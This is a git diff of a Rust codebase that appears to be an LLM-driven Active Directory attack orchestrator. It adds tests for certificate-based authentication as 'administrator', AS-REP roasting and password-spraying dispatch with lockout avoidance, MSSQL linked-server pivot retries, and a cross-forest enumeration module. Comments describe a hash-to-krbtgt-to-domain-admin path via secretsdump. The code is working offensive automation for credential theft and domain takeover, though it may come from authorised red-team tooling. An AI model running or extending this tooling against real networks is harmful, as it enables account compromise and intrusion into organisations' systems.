t.to_lowercase(); + assert!(lower != "certificate_obtained" && lower != "adcs_certificate"); + } + } + + #[test] + fn pfx_path_fallback_chain() { + // Primary key + let details = serde_json::json!({"pfx_path": "/tmp/cert.pfx"}); + let path = details + .get("pfx_path") + .or_else(|| details.get("certificate_path")) + .or_else(|| details.get("cert_file")) + .and_then(|v| v.as_str()); + assert_eq!(path, Some("/tmp/cert.pfx")); + + // Fallback to certificate_path + let details2 = serde_json::json!({"certificate_path": "/tmp/alt.pfx"}); + let path2 = details2 + .get("pfx_path") + .or_else(|| details2.get("certificate_path")) + .or_else(|| details2.get("cert_file")) + .and_then(|v| v.as_str()); + assert_eq!(path2, Some("/tmp/alt.pfx")); + + // Fallback to cert_file + let details3 = serde_json::json!({"cert_file": "/tmp/other.pfx"}); + let path3 = details3 + .get("pfx_path") + .or_else(|| details3.get("certificate_path")) + .or_else(|| details3.get("cert_file")) + .and_then(|v| v.as_str()); + assert_eq!(path3, Some("/tmp/other.pfx")); + + // No key returns None + let details4 = serde_json::json!({}); + let path4 = details4 + .get("pfx_path") + .or_else(|| details4.get("certificate_path")) + .or_else(|| details4.get("cert_file")) + .and_then(|v| v.as_str()); + assert!(path4.is_none()); + } + + #[test] + fn target_user_fallback() { + let details = serde_json::json!({"target_user": "admin"}); + let user = details + .get("target_user") + .or_else(|| details.get("upn")) + .or_else(|| details.get("account_name")) + .and_then(|v| v.as_str()) + .unwrap_or("administrator"); + assert_eq!(user, "admin"); + + // Falls back to "administrator" when no key present + let details2 = serde_json::json!({}); + let user2 = details2 + .get("target_user") + .or_else(|| details2.get("upn")) + .or_else(|| details2.get("account_name")) + .and_then(|v| v.as_str()) + .unwrap_or("administrator"); + assert_eq!(user2, "administrator"); + } + + #[test] + fn cert_auth_payload_structure() { + let payload = serde_json::json!({ + "technique": "certipy_auth", + "vuln_id": "cert-001", + "pfx_path": "/tmp/cert.pfx", + "domain": "contoso.local", + "target_user": "administrator", + }); + assert_eq!(payload["technique"], "certipy_auth"); + assert_eq!(payload["pfx_path"], "/tmp/cert.pfx"); + assert_eq!(payload["target_user"], "administrator"); + } + + #[test] + fn cert_auth_payload_with_dc() { + let mut payload = serde_json::json!({ + "technique": "certipy_auth", + "vuln_id": "cert-001", + "pfx_path": "/tmp/cert.pfx", + "domain": "contoso.local", + "target_user": "administrator", + }); + let dc_ip = Some("192.168.58.10".to_string()); + if let Some(ref dc) = dc_ip { + payload["target_ip"] = serde_json::json!(dc); + payload["dc_ip"] = serde_json::json!(dc); + } + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["dc_ip"], "192.168.58.10"); + } + + #[test] + fn cert_auth_payload_without_dc() { + let payload = serde_json::json!({ + "technique": "certipy_auth", + "vuln_id": "cert-001", + "pfx_path": "/tmp/cert.pfx", + "domain": "contoso.local", + "target_user": "administrator", + }); + assert!(payload.get("target_ip").is_none()); + assert!(payload.get("dc_ip").is_none()); + } + + #[test] + fn target_user_upn_fallback() { + let details = serde_json::json!({"upn": "admin@contoso.local"}); + let user = details + .get("target_user") + .or_else(|| details.get("upn")) + .or_else(|| details.get("account_name")) + .and_then(|v| v.as_str()) + .unwrap_or("administrator"); + assert_eq!(user, "admin@contoso.local"); + } + + #[test] + fn target_user_account_name_fallback() { + let details = serde_json::json!({"account_name": "svc_sql"}); + let user = details + .get("target_user") + .or_else(|| details.get("upn")) + .or_else(|| details.get("account_name")) + .and_then(|v| v.as_str()) + .unwrap_or("administrator"); + assert_eq!(user, "svc_sql"); + } + + #[test] + fn cert_auth_work_construction() { + let work = CertAuthWork { + vuln_id: "cert-001".into(), + dedup_key: "cert_auth:cert-001".into(), + pfx_path: "/tmp/cert.pfx".into(), + domain: "contoso.local".into(), + target_user: "administrator".into(), + dc_ip: Some("192.168.58.10".into()), + }; + assert_eq!(work.vuln_id, "cert-001"); + assert_eq!(work.dc_ip, Some("192.168.58.10".into())); + } + + #[test] + fn cert_auth_work_no_dc() { + let work = CertAuthWork { + vuln_id: "cert-002".into(), + dedup_key: "cert_auth:cert-002".into(), + pfx_path: "/tmp/cert2.pfx".into(), + domain: "fabrikam.local".into(), + target_user: "admin".into(), + dc_ip: None, + }; + assert!(work.dc_ip.is_none()); + } + + // -- Tests exercising the extracted `collect_cert_auth_work` function -- + + use crate::orchestrator::state::SharedState; + + fn make_vuln( + vuln_id: &str, + vuln_type: &str, + details: std::collections::HashMap, + ) -> ares_core::models::VulnerabilityInfo { + ares_core::models::VulnerabilityInfo { + vuln_id: vuln_id.into(), + vuln_type: vuln_type.into(), + target: "192.168.58.10".into(), + discovered_by: "test".into(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 5, + } + } + + #[tokio::test] + async fn collect_empty_state_returns_no_work() { + let shared = SharedState::new("test".into()); + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_certificate_obtained_vuln_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/admin.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + details.insert("target_user".into(), serde_json::json!("administrator")); + s.discovered_vulnerabilities.insert( + "cert-001".into(), + make_vuln("cert-001", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_id, "cert-001"); + assert_eq!(work[0].pfx_path, "/tmp/admin.pfx"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].target_user, "administrator"); + assert_eq!(work[0].dedup_key, "cert_auth:cert-001"); + assert!(work[0].dc_ip.is_none()); + } + + #[tokio::test] + async fn collect_adcs_certificate_vuln_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/svc.pfx")); + details.insert("domain".into(), serde_json::json!("fabrikam.local")); + details.insert("target_user".into(), serde_json::json!("svc_sql")); + s.discovered_vulnerabilities.insert( + "cert-002".into(), + make_vuln("cert-002", "adcs_certificate", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_id, "cert-002"); + assert_eq!(work[0].domain, "fabrikam.local"); + assert_eq!(work[0].target_user, "svc_sql"); + } + + #[tokio::test] + async fn collect_ignores_non_cert_vuln_types() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + s.discovered_vulnerabilities + .insert("vuln-esc1".into(), make_vuln("vuln-esc1", "esc1", details)); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_skips_exploited_vulnerabilities() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-010".into(), + make_vuln("cert-010", "certificate_obtained", details), + ); + s.exploited_vulnerabilities.insert("cert-010".into()); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_skips_already_deduped() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-020".into(), + make_vuln("cert-020", "certificate_obtained", details), + ); + s.mark_processed(DEDUP_CERTIPY_AUTH, "cert_auth:cert-020".into()); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_skips_vuln_without_pfx_path() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + // No pfx_path, certificate_path, or cert_file key at all + let mut details = std::collections::HashMap::new(); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-030".into(), + make_vuln("cert-030", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_pfx_fallback_to_certificate_path() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("certificate_path".into(), serde_json::json!("/tmp/alt.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-040".into(), + make_vuln("cert-040", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].pfx_path, "/tmp/alt.pfx"); + } + + #[tokio::test] + async fn collect_pfx_fallback_to_cert_file() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("cert_file".into(), serde_json::json!("/tmp/other.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-050".into(), + make_vuln("cert-050", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].pfx_path, "/tmp/other.pfx"); + } + + #[tokio::test] + async fn collect_target_user_defaults_to_administrator() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + // No target_user, upn, or account_name + s.discovered_vulnerabilities.insert( + "cert-060".into(), + make_vuln("cert-060", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_user, "administrator"); + } + + #[tokio::test] + async fn collect_target_user_from_upn() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + details.insert("upn".into(), serde_json::json!("admin@contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-070".into(), + make_vuln("cert-070", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_user, "admin@contoso.local"); + } + + #[tokio::test] + async fn collect_target_user_from_account_name() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + details.insert("account_name".into(), serde_json::json!("svc_web")); + s.discovered_vulnerabilities.insert( + "cert-080".into(), + make_vuln("cert-080", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_user, "svc_web"); + } + + #[tokio::test] + async fn collect_resolves_dc_ip_from_domain_controllers() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-090".into(), + make_vuln("cert-090", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip, Some("192.168.58.10".into())); + } + + #[tokio::test] + async fn collect_dc_ip_none_when_domain_not_mapped() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + // DC registered for a different domain + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-100".into(), + make_vuln("cert-100", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert!(work[0].dc_ip.is_none()); + } + + #[tokio::test] + async fn collect_domain_defaults_to_empty_string() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + // No domain key in details + s.discovered_vulnerabilities.insert( + "cert-110".into(), + make_vuln("cert-110", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + } + + #[tokio::test] + async fn collect_case_insensitive_vuln_type() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + details.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-120".into(), + make_vuln("cert-120", "CERTIFICATE_OBTAINED", details.clone()), + ); + s.discovered_vulnerabilities.insert( + "cert-121".into(), + make_vuln("cert-121", "Adcs_Certificate", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 2); + } + + #[tokio::test] + async fn collect_multiple_vulns_mixed_types() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + // Valid cert vuln + let mut d1 = std::collections::HashMap::new(); + d1.insert("pfx_path".into(), serde_json::json!("/tmp/a.pfx")); + d1.insert("domain".into(), serde_json::json!("contoso.local")); + s.discovered_vulnerabilities.insert( + "cert-200".into(), + make_vuln("cert-200", "certificate_obtained", d1), + ); + + // Non-cert vuln (should be ignored) + let mut d2 = std::collections::HashMap::new(); + d2.insert("target_ip".into(), serde_json::json!("192.168.58.22")); + s.discovered_vulnerabilities.insert( + "vuln-smb".into(), + make_vuln("vuln-smb", "smb_signing_disabled", d2), + ); + + // Another valid cert vuln + let mut d3 = std::collections::HashMap::new(); + d3.insert("pfx_path".into(), serde_json::json!("/tmp/b.pfx")); + d3.insert("domain".into(), serde_json::json!("fabrikam.local")); + s.discovered_vulnerabilities.insert( + "cert-201".into(), + make_vuln("cert-201", "adcs_certificate", d3), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 2); + let ids: std::collections::HashSet<_> = work.iter().map(|w| w.vuln_id.as_str()).collect(); + assert!(ids.contains("cert-200")); + assert!(ids.contains("cert-201")); + } + + #[tokio::test] + async fn collect_dc_ip_lookup_is_case_insensitive() { + let shared = SharedState::new("test".into()); + { + let mut s = shared.write().await; + // DC stored under lowercase + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let mut details = std::collections::HashMap::new(); + details.insert("pfx_path".into(), serde_json::json!("/tmp/cert.pfx")); + // Domain in mixed case in vuln details + details.insert("domain".into(), serde_json::json!("CONTOSO.LOCAL")); + s.discovered_vulnerabilities.insert( + "cert-130".into(), + make_vuln("cert-130", "certificate_obtained", details), + ); + } + let state = shared.read().await; + let work = collect_cert_auth_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip, Some("192.168.58.10".into())); + } +} diff --git a/ares-cli/src/orchestrator/automation/credential_access.rs b/ares-cli/src/orchestrator/automation/credential_access.rs index 0baeb0a7..a30f0cf0 100644 --- a/ares-cli/src/orchestrator/automation/credential_access.rs +++ b/ares-cli/src/orchestrator/automation/credential_access.rs @@ -101,10 +101,16 @@ pub async fn auto_credential_access( }; for (domain, dc_ip) in asrep_work { + let excluded_users = dispatcher + .state + .read() + .await + .quarantined_users_in_domain(&domain); let payload = json!({ "techniques": ["kerberos_user_enum_noauth", "asrep_roast", "username_as_password"], "target_ip": dc_ip, "domain": domain, + "excluded_users": excluded_users.join(","), }); let priority = dispatcher.effective_priority("asrep_roast"); @@ -150,14 +156,14 @@ pub async fn auto_credential_access( if state.is_processed(DEDUP_CRACK_REQUESTS, &dedup) { return None; } - // Exact domain match first - if let Some(dc_ip) = state.domain_controllers.get(&cred_domain).cloned() { + // Exact domain match first (using robust DC resolution) + if let Some(dc_ip) = state.resolve_dc_ip(&cred_domain) { return Some((dedup, dc_ip, cred_domain, cred.clone())); } // Fallback: check child domains (e.g. cred has "contoso.local" // but user is actually in "child.contoso.local") let suffix = format!(".{cred_domain}"); - for (domain, dc_ip) in &state.domain_controllers { + for (domain, dc_ip) in &state.all_domains_with_dcs() { if domain.ends_with(&suffix) { debug!( cred_domain = %cred_domain, @@ -215,6 +221,10 @@ pub async fn auto_credential_access( .users .iter() .filter(|u| !u.domain.is_empty()) + // Skip AD built-in disabled accounts (guest, krbtgt, etc.). + // Spraying these can never succeed and burns badPwdCount budget + // that real accounts share under domain lockout policy. + .filter(|u| !ares_core::models::is_always_disabled_account(&u.username)) // Skip delegation accounts — their auth budget is reserved for // S4U exploitation. Spraying them causes lockout before S4U fires. .filter(|u| !state.is_delegation_account(&u.username)) @@ -256,10 +266,16 @@ pub async fn auto_credential_access( } sprayed_domains.insert(domain.clone()); + let excluded_users = dispatcher + .state + .read() + .await + .quarantined_users_in_domain(domain); let payload = json!({ "technique": "username_as_password", "target_ip": dc_ip, "domain": domain, + "excluded_users": excluded_users.join(","), }); match dispatcher @@ -510,12 +526,19 @@ pub async fn auto_credential_access( }; for (domain, dc_ip) in common_spray_work { + let excluded_users = dispatcher + .state + .read() + .await + .quarantined_users_in_domain(&domain); let payload = json!({ "techniques": ["password_spray", "username_as_password"], "reason": "low_hanging_fruit", "target_ip": dc_ip, "domain": domain, "use_common_passwords": true, + "acknowledge_no_policy": true, + "excluded_users": excluded_users.join(","), }); // Mark as processed BEFORE submitting to prevent duplicate deferred entries. @@ -552,6 +575,8 @@ pub async fn auto_credential_access( mod tests { use super::*; + // --- kerberoast_dedup_key --- + #[test] fn kerberoast_dedup_key_basic() { assert_eq!( @@ -573,6 +598,8 @@ mod tests { assert_eq!(kerberoast_dedup_key("", ""), "krb::"); } + // --- spray_dedup_key --- + #[test] fn spray_dedup_key_basic() { assert_eq!( @@ -591,6 +618,8 @@ mod tests { assert_eq!(spray_dedup_key("", ""), ":"); } + // --- common_spray_dedup_key --- + #[test] fn common_spray_dedup_key_basic() { assert_eq!( @@ -604,6 +633,8 @@ mod tests { assert_eq!(common_spray_dedup_key(""), "common:"); } + // --- low_hanging_dedup_key --- + #[test] fn low_hanging_dedup_key_basic() { assert_eq!( @@ -617,6 +648,8 @@ mod tests { assert_eq!(low_hanging_dedup_key("", ""), ":"); } + // --- credential_secretsdump_dedup_key --- + #[test] fn credential_secretsdump_dedup_key_basic() { assert_eq!( @@ -639,6 +672,8 @@ mod tests { assert_eq!(credential_secretsdump_dedup_key("", "", ""), "::"); } + // --- resolve_host_domain_from_fqdn --- + #[test] fn resolve_host_domain_from_fqdn_typical() { assert_eq!( @@ -673,6 +708,8 @@ mod tests { assert_eq!(resolve_host_domain_from_fqdn(""), ""); } + // --- is_host_domain_related --- + #[test] fn is_host_domain_related_same_domain() { assert!(is_host_domain_related("contoso.local", "contoso.local")); diff --git a/ares-cli/src/orchestrator/automation/credential_expansion.rs b/ares-cli/src/orchestrator/automation/credential_expansion.rs index 773af2d6..dcae7770 100644 --- a/ares-cli/src/orchestrator/automation/credential_expansion.rs +++ b/ares-cli/src/orchestrator/automation/credential_expansion.rs @@ -8,8 +8,9 @@ use std::sync::Arc; use std::time::Duration; +use redis::AsyncCommands; use tokio::sync::watch; -use tracing::debug; +use tracing::{debug, info}; use crate::orchestrator::dispatcher::Dispatcher; use crate::orchestrator::state::*; @@ -319,7 +320,11 @@ pub async fn auto_credential_expansion( // This is the fastest path from hash → krbtgt → DA. { let state = dispatcher.state.read().await; - let dc_ips: Vec = state.domain_controllers.values().cloned().collect(); + let dc_ips: Vec = state + .all_domains_with_dcs() + .into_iter() + .map(|(_, ip)| ip) + .collect(); drop(state); if !dispatcher.is_technique_allowed("secretsdump") { @@ -378,7 +383,120 @@ pub async fn auto_credential_expansion( .await; } } + + // 5. Re-dispatch unsuccessful mssql_access vulns when a new same-domain + // cleartext credential is available. Cross-forest MSSQL pivots fail + // if the LLM tries them before any usable cred exists in the linked + // server's source forest — once that cred arrives, push the vuln + // back into the exploitation ZSET so the LLM gets another shot + // with the new credential set in its prompt context. + let retries = collect_mssql_retries(&dispatcher).await; + for retry in retries { + if let Err(e) = requeue_mssql_vuln(&dispatcher, &retry).await { + debug!(err = %e, vuln_id = %retry.vuln_id, "Failed to requeue mssql_access"); + continue; + } + info!( + vuln_id = %retry.vuln_id, + cred_user = %retry.cred_user, + cred_domain = %retry.cred_domain, + "Re-queued mssql_access for new credential" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_MSSQL_RETRY, retry.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_MSSQL_RETRY, &retry.dedup_key) + .await; + } + } +} + +struct MssqlRetry { + vuln_id: String, + vuln_json: String, + priority: i32, + cred_user: String, + cred_domain: String, + dedup_key: String, +} + +/// Walk discovered vulnerabilities for `mssql_access` entries that are not +/// yet exploited and have at least one matching unseen credential. Builds +/// a (vuln, credential) work item with a stable dedup key so the same +/// vuln/cred pair is not re-queued repeatedly. +async fn collect_mssql_retries(dispatcher: &Arc) -> Vec { + let state = dispatcher.state.read().await; + let mut out = Vec::new(); + for vuln in state.discovered_vulnerabilities.values() { + if vuln.vuln_type != "mssql_access" { + continue; + } + if state.exploited_vulnerabilities.contains(&vuln.vuln_id) { + continue; + } + let vuln_domain = vuln + .details + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_lowercase(); + for cred in &state.credentials { + if cred.password.is_empty() || cred.domain.is_empty() { + continue; + } + // Match on domain when the vuln carries one. Otherwise match any + // cred — the LLM will pick from the prompt's credential list. + let cred_dom = cred.domain.to_lowercase(); + let matches_domain = vuln_domain.is_empty() + || cred_dom == vuln_domain + || cred_dom.ends_with(&format!(".{vuln_domain}")) + || vuln_domain.ends_with(&format!(".{cred_dom}")); + if !matches_domain { + continue; + } + let dedup_key = format!( + "{}:{}:{}", + vuln.vuln_id, + cred.username.to_lowercase(), + cred_dom + ); + if state.is_processed(DEDUP_MSSQL_RETRY, &dedup_key) { + continue; + } + let Ok(vuln_json) = serde_json::to_string(vuln) else { + continue; + }; + out.push(MssqlRetry { + vuln_id: vuln.vuln_id.clone(), + vuln_json, + priority: vuln.priority, + cred_user: cred.username.clone(), + cred_domain: cred.domain.clone(), + dedup_key, + }); + } } + out +} + +/// Push the vuln back into the exploitation ZSET. The exploitation_workflow +/// loop pops by lowest score; reuse the original priority so the retry +/// competes fairly with other work. +async fn requeue_mssql_vuln( + dispatcher: &Arc, + retry: &MssqlRetry, +) -> anyhow::Result<()> { + let key = dispatcher.state.vuln_queue_key().await; + let mut conn = dispatcher.queue.connection(); + let _: () = conn + .zadd(&key, &retry.vuln_json, retry.priority as f64) + .await?; + let _: () = conn.expire(&key, 86400).await.unwrap_or(()); + Ok(()) } struct ExpansionWork { @@ -423,12 +541,12 @@ mod tests { #[test] fn netbios_domain_resolution() { // Simulate the NetBIOS→FQDN resolution logic from the automation loop - let raw = "NORTH"; + let raw = "CHILD"; let raw_lower = raw.to_lowercase(); // When netbios_to_fqdn has a mapping, use it let mut map = std::collections::HashMap::new(); - map.insert("north".to_string(), "north.contoso.local".to_string()); + map.insert("child".to_string(), "child.contoso.local".to_string()); let resolved = if !raw_lower.contains('.') { map.get(&raw_lower) @@ -437,7 +555,7 @@ mod tests { } else { raw_lower.clone() }; - assert_eq!(resolved, "north.contoso.local"); + assert_eq!(resolved, "child.contoso.local"); // When FQDN is already used, pass through let fqdn_raw = "contoso.local"; @@ -452,7 +570,7 @@ mod tests { assert_eq!(resolved2, "contoso.local"); // When no mapping exists, use the raw value - let unknown = "CHILD"; + let unknown = "UNKNOWN"; let unknown_lower = unknown.to_lowercase(); let resolved3 = if !unknown_lower.contains('.') { map.get(&unknown_lower) @@ -461,7 +579,7 @@ mod tests { } else { unknown_lower.clone() }; - assert_eq!(resolved3, "child"); + assert_eq!(resolved3, "unknown"); } #[test] diff --git a/ares-cli/src/orchestrator/automation/credential_reuse.rs b/ares-cli/src/orchestrator/automation/credential_reuse.rs index ebacf8dd..3573ab06 100644 --- a/ares-cli/src/orchestrator/automation/credential_reuse.rs +++ b/ares-cli/src/orchestrator/automation/credential_reuse.rs @@ -19,6 +19,13 @@ use crate::orchestrator::dispatcher::Dispatcher; const DEDUP_CROSS_REUSE: &str = "cross_reuse"; /// Check if a username is a high-value reuse candidate. +/// +/// Machine accounts (`HOST$`) are NEVER reuse candidates — their NT hash is +/// derived from the computer's randomly-generated 240-byte password and is +/// bound to that computer object in its source NTDS. The hash will not +/// authenticate as another machine, in another domain, or in any trusted +/// forest. Dispatching `secretsdump` with a foreign machine hash always +/// returns STATUS_LOGON_FAILURE and just burns dispatcher budget. fn is_reuse_candidate(username: &str) -> bool { if username.ends_with('$') { return false; @@ -87,7 +94,7 @@ pub async fn auto_credential_reuse( let state = dispatcher.state.read().await; // Need at least 2 known DCs (implies multiple domains) - if state.domain_controllers.len() < 2 { + if state.all_domains_with_dcs().len() < 2 { continue; } @@ -105,7 +112,7 @@ pub async fn auto_credential_reuse( for hash in &reuse_candidates { let hash_domain = hash.domain.to_lowercase(); - for (dc_domain, dc_ip) in &state.domain_controllers { + for (dc_domain, dc_ip) in &state.all_domains_with_dcs() { let target_domain = dc_domain.to_lowercase(); // Skip same domain and parent/child domains (handled by secretsdump.rs) diff --git a/ares-cli/src/orchestrator/automation/cross_forest_enum.rs b/ares-cli/src/orchestrator/automation/cross_forest_enum.rs new file mode 100644 index 00000000..98d62dfc --- /dev/null +++ b/ares-cli/src/orchestrator/automation/cross_forest_enum.rs @@ -0,0 +1,881 @@ +//! auto_cross_forest_enum -- targeted cross-forest enumeration. +//! +//! When we have Admin Pwn3d on a DC in a foreign forest but haven't enumerated +//! that forest's users/groups, this module dispatches targeted LDAP enumeration +//! using the best available credential path. +//! +//! Unlike `auto_domain_user_enum` (which fires once per domain), this module +//! retries with better credentials as they become available — specifically: +//! - Cracked passwords from cross-forest secretsdump hashes +//! - Credentials obtained via MSSQL linked server pivots +//! - Admin credentials from owned DCs in the foreign forest +//! +//! This covers the gap where the trusted forest's users are not enumerated +//! because initial recon only has primary-forest credentials. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Check if a credential belongs to a different forest than the target domain. +fn is_cross_forest(cred_domain: &str, target_domain: &str) -> bool { + let c = cred_domain.to_lowercase(); + let t = target_domain.to_lowercase(); + // Same domain or parent/child = same forest + !(c == t || c.ends_with(&format!(".{t}")) || t.ends_with(&format!(".{c}"))) +} + +/// Build dedup key incorporating the credential to allow retry with better creds. +fn cross_forest_dedup_key(domain: &str, username: &str, cred_domain: &str) -> String { + format!( + "xforest:{}:{}@{}", + domain.to_lowercase(), + username.to_lowercase(), + cred_domain.to_lowercase() + ) +} + +fn bind_domain_for_cross_forest(cred_domain: &str, target_domain: &str) -> Option { + if cred_domain.trim().is_empty() || cred_domain.eq_ignore_ascii_case(target_domain) { + None + } else { + Some(cred_domain.to_string()) + } +} + +/// Collect cross-forest enumeration work items from the current state. +/// +/// Returns an empty vec when there are fewer than 2 domains, no credentials, +/// or no actionable work to dispatch. +fn collect_cross_forest_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() || state.domains.len() < 2 { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + let domain_lower = domain.to_lowercase(); + + // Count how many users we know in this domain. + let known_user_count = state + .credentials + .iter() + .filter(|c| c.domain.to_lowercase() == domain_lower) + .count(); + + // Also count hashes for this domain. + let known_hash_count = state + .hashes + .iter() + .filter(|h| h.domain.to_lowercase() == domain_lower) + .count(); + + // Skip domains where we already have good coverage + // (at least 5 credentials or 10 hashes = likely already enumerated). + if known_user_count >= 5 || known_hash_count >= 10 { + continue; + } + + // Find the best credential for this domain. + // Priority: same-domain cred > admin cred > cracked hash > any cred. + let best_cred = state + .credentials + .iter() + .filter(|c| { + !c.password.is_empty() && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .min_by_key(|c| { + let c_dom = c.domain.to_lowercase(); + if c_dom == domain_lower { + 0 // Same domain = best + } else if c.is_admin { + 1 // Admin from another domain = good (trust auth) + } else if !is_cross_forest(&c_dom, &domain_lower) { + 2 // Same forest = acceptable + } else { + 3 // Cross-forest = may work via trust + } + }) + .cloned(); + + let cred = match best_cred { + Some(c) => c, + None => continue, + }; + + let dedup_key = cross_forest_dedup_key(&domain_lower, &cred.username, &cred.domain); + if state.is_processed(DEDUP_CROSS_FOREST_ENUM, &dedup_key) { + continue; + } + + items.push(CrossForestWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + is_under_enumerated: known_user_count < 3, + }); + } + + items +} + +/// Dispatches targeted user + group enumeration for foreign forests. +/// Interval: 45s. +pub async fn auto_cross_forest_enum( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + 